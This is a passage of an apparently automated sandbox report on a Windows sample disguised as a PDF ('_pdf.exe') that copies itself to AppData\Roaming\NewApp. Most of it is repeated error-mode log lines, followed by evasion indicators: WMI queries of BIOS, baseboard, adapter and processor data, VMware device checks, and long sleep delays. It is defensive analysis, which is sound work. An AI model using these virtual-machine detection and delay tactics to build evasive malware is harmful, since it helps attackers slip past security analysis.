                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindow / User API: threadDelayed 3080
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindow / User API: threadDelayed 1547
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindow / User API: threadDelayed 8247
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 455
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 2903
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 399
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 2121
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 1169
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 8261
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 1524
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 7044Thread sleep count: 3080 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 7044Thread sleep count: 223 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 7044Thread sleep count: 223 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6180Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6172Thread sleep count: 1547 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6172Thread sleep count: 8247 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6180Thread sleep count: 48 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832Thread sleep count: 455 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832Thread sleep count: 2903 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832Thread sleep count: 399 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 4696Thread sleep count: 2121 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 4696Thread sleep count: 1169 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6124Thread sleep time: -25825441703193356s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6972Thread sleep count: 8261 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6972Thread sleep count: 1524 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6124Thread sleep count: 43 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: NewApp.exe, 00000018.00000002.923839104.0000000006230000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
